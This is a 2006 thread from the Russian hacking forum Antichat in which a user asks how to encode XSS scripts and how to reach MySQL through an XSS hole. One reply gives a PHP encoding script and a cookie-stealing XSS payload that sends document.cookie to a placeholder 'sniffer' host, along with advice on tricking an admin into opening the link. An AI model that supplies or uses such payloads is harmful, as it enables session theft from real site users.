ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Кодировка скриптов
  #1  
Старый 21.02.2006, 23:10
Аватар для LoFFi
LoFFi
Участник форума
Регистрация: 21.02.2006
Сообщений: 285
Провел на форуме:
1347867

Репутация: 408
Отправить сообщение для LoFFi с помощью ICQ
По умолчанию Кодировка скриптов

Подскажите плз как кодируют скрипты?
Ну типа как при XSS например код что то вроде "><script>alert('lol')</script> а получаеться что то типа ...72%69%70%74%3e...

Да, и еще. Вот я в локалке нашел сайт, на котором дыра XSS, я попытался на прямую прописать <script>SHOW DATABASES;</script> После запроса оно меня посекло. Как можно спятать, или по другому добраться до MySQL?
 
Ответить с цитированием

  #2  
Старый 21.02.2006, 23:42
Аватар для Evolution
Evolution
Познающий
Регистрация: 09.09.2005
Сообщений: 90
Провел на форуме:
827197

Репутация: 22
Отправить сообщение для Evolution с помощью ICQ
По умолчанию

вот скрипт:
<?
$str = urldecode($_SERVER['QUERY_STRING']);
for($i=0;$i<strlen($str);$i++) {
$hex=dechex(ord($str[$i]));
if($str[$i]=='&')
echo "$str[$i]";
else
echo "%$hex";
}
?>
а насчёт твоего вопроса про xss.
что ты там пишешь? что тебя просекло?
ты не то пишешь, тебе надо вставить место твоего(<script>SHOW DATABASES;</script>)непонятно кода, ссылку на снифер, примерно так: <script src="http://tvoi_snifer?"+document.cookie;></script> где "http://tvoi_snifer"-адрес снифера, куда придут куки.
ну и дать ету ссылку админу, как он пройдёт по этой ссылке, к тебе на снифер придут куки.

Последний раз редактировалось Evolution; 22.02.2006 в 00:02..
 
Ответить с цитированием

  #3  
Старый 22.02.2006, 10:35
Аватар для Tem
Tem
Banned
Регистрация: 05.10.2005
Сообщений: 965
Провел на форуме:
5888800

Репутация: 547


Отправить сообщение для Tem с помощью ICQ
По умолчанию

Что это такое (<script>SHOW DATABASES;</script>), в первые вижу такой запрос к базе, тебе надо прочитать синтаксисы в MySQL, или Sql-injection,статью, иши на форум их полно тута.
 
Ответить с цитированием

  #4  
Старый 22.02.2006, 17:04
Аватар для LoFFi
LoFFi
Участник форума
Регистрация: 21.02.2006
Сообщений: 285
Провел на форуме:
1347867

Репутация: 408
Отправить сообщение для LoFFi с помощью ICQ
По умолчанию

Вот такой общий вопрос, могу ли я через XSS как нить попасть в MySQL? Если да, то как? я даже не знаю имени базы
 
Ответить с цитированием

  #5  
Старый 22.02.2006, 21:03
Аватар для w4rd3n
w4rd3n
Banned
Регистрация: 06.10.2005
Сообщений: 180
Провел на форуме:
244618

Репутация: -4
По умолчанию

Нет не можешь ни как...!
Не считая получить shell найти пароль от sql
 
Ответить с цитированием

  #6  
Старый 22.02.2006, 22:55
Аватар для vectorg
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
Провел на форуме:
3212607

Репутация: 454
По умолчанию

если не допёрло что делать из второго поста, иди сюда -> http://ha.ckers.org/xss.html, прокручивай в самый низ, ну а дальше и так всё ясно...
 
Ответить с цитированием

  #7  
Старый 22.02.2006, 23:49
Аватар для LoFFi
LoFFi
Участник форума
Регистрация: 21.02.2006
Сообщений: 285
Провел на форуме:
1347867

Репутация: 408
Отправить сообщение для LoFFi с помощью ICQ
По умолчанию

Вы тут только не нервничайте =) Просто есть сайт (в локале) на котором есть дыра XSS. На сайте нет никакой страницы входа, она просто выводит данные из MySQL. Права на все папки выставлены. Есть способ пробраться в MySQL?
 
Ответить с цитированием

  #8  
Старый 23.02.2006, 00:45
Аватар для KEZ
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию

Цитата:
Вы тут только не нервничайте =) Просто есть сайт (в локале) на котором есть дыра XSS. На сайте нет никакой страницы входа, она просто выводит данные из MySQL. Права на все папки выставлены. Есть способ пробраться в MySQL?
10000000 раз повторяем: XSS - дает возможность навредить ИСКЛЮЧИТЕЛЬНО браузеру жертвы. У тебя есть жертва, у которой нужно украсть куки, редиректнуть ее на другую страницу, и т д?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Посоветуйте способы уменьшения объема скриптов DizzZ PHP, PERL, MySQL, JavaScript 8 27.01.2006 13:33
Поиск дырявых скриптов Oleu Болталка 0 15.12.2005 14:07
Кодировка. Zakary Windows 1 08.12.2005 20:44
Странная кодировка в форуме Nova Уязвимости 26 05.10.2005 14:51
Взлом скриптов моментальных казино virus_dushi Болталка 0 26.11.2004 03:04



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ